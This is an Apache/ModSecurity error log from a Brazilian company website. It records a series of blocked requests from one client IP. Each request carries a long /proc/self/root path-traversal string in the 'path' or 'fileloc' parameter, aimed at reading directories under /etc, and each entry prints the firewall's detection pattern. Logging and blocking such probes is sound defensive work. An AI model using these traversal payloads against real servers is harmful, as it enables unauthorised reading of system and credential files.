[Tue Mar 17 12:02:52.853031 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.243.203:47956] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltHKt8Nd0UC_OcbVG-AgAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:02:55.163009 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.243.203:47964] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltH9CmCSWTlPouqorZgQAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:07.440756 2026] [:error] [pid 17965:tid 140411599251200] [client 74.7.243.203:47980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltK6t8Nd0UC_OcbVG-EQAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:10.803624 2026] [:error] [pid 9155:tid 140411624429312] [client 74.7.243.203:33928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltLtbI7zhHXcabyMUzxQAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:13.232173 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.243.203:45092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltMdCmCSWTlPouqorZhQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:14.516875 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.203:45094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltMtY0UrI5A3LftIzwTwAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:15.823209 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.203:45096] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltMweiSKl8TjouI-YPlgAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:16.982500 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.203:45102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltNNY0UrI5A3LftIzwUAAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:18.387551 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.203:45114] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltNtY0UrI5A3LftIzwUQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:22.373670 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.243.203:45130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltOgeiSKl8TjouI-YPmQAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:26.929236 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.243.203:48134] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltPtCmCSWTlPouqorZjAAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:28.267329 2026] [:error] [pid 9155:tid 140411674785536] [client 74.7.243.203:48138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltQNbI7zhHXcabyMUzxgAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:29.582029 2026] [:error] [pid 9155:tid 140411565680384] [client 74.7.243.203:48152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltQdbI7zhHXcabyMUzxwAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:35.264043 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.243.203:46342] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltRweiSKl8TjouI-YPoQAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:38.855183 2026] [:error] [pid 9155:tid 140411557287680] [client 74.7.243.203:46348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltStbI7zhHXcabyMUzzgAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:40.180854 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.243.203:52832] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltTNCmCSWTlPouqorZkAAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:41.435522 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.203:52846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltTdY0UrI5A3LftIzwUgAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:43.864017 2026] [:error] [pid 9299:tid 140411582465792] [client 74.7.243.203:52862] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltT7-sgTmmJoPuMdysCgAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:45.713615 2026] [:error] [pid 9299:tid 140411632822016] [client 74.7.243.203:52866] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltUb-sgTmmJoPuMdysCwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:48.191794 2026] [:error] [pid 2160:tid 140411624429312] [client 74.7.243.203:52876] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltVDjrdei6i7MVRTDQ9wAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:49.511475 2026] [:error] [pid 9299:tid 140411599251200] [client 74.7.243.203:52888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltVb-sgTmmJoPuMdysDAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
